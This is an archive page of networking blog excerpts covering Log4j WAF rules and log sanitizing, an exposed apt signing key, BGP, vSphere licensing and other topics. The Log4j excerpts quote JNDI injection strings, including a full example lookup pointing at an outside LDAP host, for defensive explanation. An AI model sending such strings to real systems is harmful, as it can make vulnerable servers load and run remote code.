Archive

Category Archives for "Networking"

Protection against CVE-2021-45046, the additional Log4j RCE vulnerability

Protection against CVE-2021-45046, the additional Log4j RCE vulnerability
Protection against CVE-2021-45046, the additional Log4j RCE vulnerability

Hot on the heels of CVE-2021-44228 a second Log4J CVE has been filed CVE-2021-45046. The rules that we previously released for CVE-2021-44228 give the same level of protection for this new CVE.

This vulnerability is actively being exploited and anyone using Log4J should update to version 2.16.0 as soon as possible, even if you have previously updated to 2.15.0. The latest version can be found on the Log4J download page.

Customers using the Cloudflare WAF have three rules to help mitigate any exploit attempts:

Rule ID Description Default Action
100514 (legacy WAF)
6b1cc72dff9746469d4695a474430f12 (new WAF)
Log4J Headers BLOCK
100515 (legacy WAF)
0c054d4e4dd5455c9ff8f01efe5abb10 (new WAF)
Log4J Body BLOCK
100516 (legacy WAF)
5f6744fa026a4638bda5b3d7d5e015dd (new WAF)
Log4J URL BLOCK

The mitigation has been split across three rules inspecting HTTP headers, body and URL respectively.

In addition to the above rules we have also released a fourth rule that will protect against a much wider range of attacks at the cost of a higher false positive rate. For that reason we have made it available but not set it to BLOCK by default:

Rule ID Description Default Action
100517 (legacy WAF)
2c5413e155db4365befe0df160ba67d7 (new WAF)
Log4J Advanced URI, Headers DISABLED

Who Continue reading

An exposed apt signing key and how to improve apt security

An exposed apt signing key and how to improve apt security
An exposed apt signing key and how to improve apt security

Recently, we received a bug bounty report regarding the GPG signing key used for pkg.cloudflareclient.com, the Linux package repository for our Cloudflare WARP products. The report stated that this private key had been exposed. We’ve since rotated this key and we are taking steps to ensure a similar problem can’t happen again. Before you read on, if you are a Linux user of Cloudflare WARP, please follow these instructions to rotate the Cloudflare GPG Public Key trusted by your package manager. This only affects WARP users who have installed WARP on Linux. It does not affect Cloudflare customers of any of our other products or WARP users on mobile devices.

But we also realized that the impact of an improperly secured private key can have consequences that extend beyond the scope of one third-party repository. The remainder of this blog shows how to improve the security of apt with third-party repositories.

The unexpected impact

At first, we thought that the exposed signing key could only be used by an attacker to forge packages distributed through our package repository. However, when reviewing impact for Debian and Ubuntu platforms we found that our instructions were outdated and insecure. In fact, Continue reading

Switch vSphere Enterprise Plus license to vSphere Standard on a NSX-T enabled cluster

This article describes the strange workaround of switching VMware NSX-T enabled cluster from using vSphere Enterprise Plus license to vSphere Standard license with vDS licensed through NSX-T. I really hope that you will not need to go through this as it is quite like bringing the whole environment up from scratch. But if you have two clusters with enough resources it will enable you to do it without downtime. Environment on which this was tested is vSphere 7.0.2 and NSX-T 3.1.2 NSX-T as a network and security platform enables network functions to be virtualised on your vSphere cluster. The way

The post Switch vSphere Enterprise Plus license to vSphere Standard on a NSX-T enabled cluster appeared first on How Does Internet Work.

Highlights: Dynamic Negotiation of BGP Capabilities

The Dynamic Negotiation of BGP Capabilities blog post generated almost no comments, apart from the #facepalm realization that a certain network operating system resets IBGP sessions when the sole EBGP session goes down, but there were a few interesting comments on LinkedIn and Twitter.

While most engineers easily relate to the awkwardness of bringing down a BGP session to enable new functionality (Tearing down BGP session, as a solution reminds me rebooting a host, as a solution.), it’s not as easy as it looks. As Adam Chappell put itDynamic capability renegotiation does tend to sound a bit like changing the tyres while still moving. Very neat if you can pull it off but so much to go wrong…

Highlights: Dynamic Negotiation of BGP Capabilities

The Dynamic Negotiation of BGP Capabilities blog post generated almost no comments, apart from the #facepalm realization that a certain network operating system resets IBGP sessions when the sole EBGP session goes down, but there were a few interesting comments on LinkedIn and Twitter.

While most engineers easily relate to the awkwardness of bringing down a BGP session to enable new functionality (Tearing down BGP session, as a solution reminds me rebooting a host, as a solution.), it’s not as easy as it looks. As Adam Chappell put itDynamic capability renegotiation does tend to sound a bit like changing the tyres while still moving. Very neat if you can pull it off but so much to go wrong…

IPv4 Address Markets

We have come down a long and tortuous path with respect to the treatment of Internet addresses. The debate continues over whether the formation of markets for IPv4 addresses was a positive step for the Internet, or a forced decision that was taken with extreme reluctance. Let’s scratch at this topic and look at the formation of this market in IP addresses and the dynamics behind it and then look at the future prospects for this market.

Equinix expands adds more processors to its bare-metal service

Data-center giant Equinix has expanded its bare-metal services to offer CPU, GPU, and AI processors on its Equinix Metal service offering.The service now includes AMD’s Milan generation of Epyc processors, Ampere’s Arm-based Altra, and Intel’s Ice Lake generation of Xeon processors.[Get regularly scheduled insights by signing up for Network World newsletters.] In November, Nvidia and Equinix announced an expanded collaboration to bring Nvidia’s LaunchPad AI platform, which includes instant, short-term access to AI infrastructure, to nine Equinix International Business Exchange (IBX) data centers globally. Enterprise accounts can test AI apps on LaunchPad, then deploy and scale on Equinix Metal or Nvidia DGX Foundry, which are also running at Equinix. To read this article in full, please click here

Equinix expands adds more processors to its bare-metal service

Data-center giant Equinix has expanded its bare-metal services to offer CPU, GPU, and AI processors on its Equinix Metal service offering.The service now includes AMD’s Milan generation of Epyc processors, Ampere’s Arm-based Altra, and Intel’s Ice Lake generation of Xeon processors.[Get regularly scheduled insights by signing up for Network World newsletters.] In November, Nvidia and Equinix announced an expanded collaboration to bring Nvidia’s LaunchPad AI platform, which includes instant, short-term access to AI infrastructure, to nine Equinix International Business Exchange (IBX) data centers globally. Enterprise accounts can test AI apps on LaunchPad, then deploy and scale on Equinix Metal or Nvidia DGX Foundry, which are also running at Equinix. To read this article in full, please click here

Exploitation of Log4j CVE-2021-44228 before public disclosure and evolution of evasion and exfiltration

Exploitation of Log4j CVE-2021-44228 before public disclosure and evolution of evasion and exfiltration

In this blog post we will cover WAF evasion patterns and exfiltration attempts seen in the wild, trend data on attempted exploitation, and information on exploitation that we saw prior to the public disclosure of CVE-2021-44228.

In short, we saw limited testing of the vulnerability on December 1, eight days before public disclosure. We saw the first attempt to exploit the vulnerability just nine minutes after public disclosure showing just how fast attackers exploit newly found problems.

We also see mass attempts to evade WAFs that have tried to perform simple blocking, we see mass attempts to exfiltrate data including secret credentials and passwords.

WAF Evasion Patterns and Exfiltration Examples

Since the disclosure of CVE-2021-44228 (now commonly referred to as Log4Shell) we have seen attackers go from using simple attack strings to actively trying to evade blocking by WAFs. WAFs provide a useful tool for stopping external attackers and WAF evasion is commonly attempted to get past simplistic rules.

In the earliest stages of exploitation of the Log4j vulnerability attackers were using un-obfuscated strings typically starting with ${jndi:dns, ${jndi:rmi and ${jndi:ldap and simple rules to look for those patterns were effective.

Quickly after those strings were being blocked and attackers Continue reading

IBM,Samsung team on unconventional, super-efficient semiconductor

IBM and Samsung Electronics have designed what the tech giants call an unconventionally designed semiconductor that promises to reduce energy consumption by 85% over existing chips.The design would enable a ton of new applications including energy-efficient cryptomining and data encryption but also cell phone batteries that could hold a charge for over a week instead of days without being recharged, companies stated.[Get regularly scheduled insights by signing up for Network World newsletters.] The new semiconductor could also find its way into new internet of things (IoT) and edge devices that draw less energy, letting them operate in more diverse environments like ocean buoys, autonomous vehicles and spacecraft, the companies stated. To read this article in full, please click here

IBM, Samsung team on unconventional, super-efficient semiconductor

IBM and Samsung Electronics have designed what the tech giants call an unconventionally designed semiconductor that promises to reduce energy consumption by 85% over existing chips.The design would enable a ton of new applications including energy-efficient cryptomining and data encryption but also cell phone batteries that could hold a charge for over a week instead of days without being recharged, companies stated.[Get regularly scheduled insights by signing up for Network World newsletters.] The new semiconductor could also find its way into new internet of things (IoT) and edge devices that draw less energy, letting them operate in more diverse environments like ocean buoys, autonomous vehicles and spacecraft, the companies stated. To read this article in full, please click here

Full Stack Journey 061: Linux Networking And Observability With eBPF And Cilium

eBPF has taken the Linux networking world by storm. But what is it, exactly? And how it is related to the open-source Cilium project? Duffie Cooley joins Scott Lowe on the Full Stack Journey podcast to discuss eBPF and Cilium. If you're into Linux, networking, or Kubernetes---or any combination of these---this episode is for you!

The post Full Stack Journey 061: Linux Networking And Observability With eBPF And Cilium appeared first on Packet Pushers.

Sanitizing Cloudflare Logs to protect customers from the Log4j vulnerability

Sanitizing Cloudflare Logs to protect customers from the Log4j vulnerability

On December 9, 2021, the world learned about CVE-2021-44228, a zero-day exploit affecting the Apache Log4j utility.  Cloudflare immediately updated our WAF to help protect against this vulnerability, but we recommend customers update their systems as quickly as possible.

However, we know that many Cloudflare customers consume their logs using software that uses Log4j, so we are also mitigating any exploits attempted via Cloudflare Logs. As of this writing, we are seeing the exploit pattern in logs we send to customers up to 1000 times every second.

Starting immediately, customers can update their Logpush jobs to automatically redact tokens that could trigger this vulnerability. You can read more about this in our developer docs or see details below.

How the attack works

You can read more about how the Log4j vulnerability works in our blog post here. In short, an attacker can add something like ${jndi:ldap://example.com/a} in any string. Log4j will then make a connection on the Internet to retrieve this object.

Cloudflare Logs contain many string fields that are controlled by end-users on the public Internet, such as User Agent and URL path. With this vulnerability, it is possible that a malicious user can cause a remote Continue reading

Checking Network Device Configurations in a GitOps CI Pipeline

Here’s a fun fact network automation pundits don’t want to hear: if you’re working with replaceable device configurations (as we did for the past 20 years, at least those fortunate enough to buy Junos), you already meet the Infrastructure-as-Code requirements. Storing device configurations in a version control system and using reviews and merge requests to change them (aka GitOps) is just a cherry on the cake.

When I made a claim along these same lines a few weeks ago during the Network Automation Concepts webinar, Vladimir Troitskiy sent me an interesting question:

Checking Network Device Configurations in a GitOps CI Pipeline

Here’s a fun fact network automation pundits don’t want to hear: if you’re working with replaceable device configurations (as we did for the past 20 years, at least those fortunate enough to buy Junos), you already meet the Infrastructure-as-Code requirements. Storing device configurations in a version control system and using reviews and merge requests to change them (aka GitOps) is just a cherry on the cake.

When I made a claim along these same lines a few weeks ago during the Network Automation Concepts webinar, Vladimir Troitskiy sent me an interesting question:

Unifi docker upgrade

This post is mostly a note to self for when I need to upgrade next time.

Because of the recent bug in log4j, which also affected the Unifi controller, I decided to finally upgrade the controller software.

Some background: There a few different ways to run the controller. You can use “the cloud”, run it yourself on some PC or raspberry pi, or you can buy their appliance.

I run it myself, because I already have a raspberry pi 4 running, which is cheaper than the appliance, and gives me control of my data and works during an ISP outage.

I thought it’d be a good opportunity to play with docker, too.

How to upgrade

Turns out I’d saved the command I used to create the original docker image. Good thing too, because it seems that upgrading is basically delete the old, install the new.

  1. Take a backup from the UI.
  2. Stop the old instance (docker stop <old-name-here>).
  3. Take a backup of the state directory.
  4. Make sure the old instance doesn’t restart (docker update --restart=no <old-name-here>).
  5. Create a new instance with the same state directory.
  6. Wait a long time (at least on Raspberry Pi), like Continue reading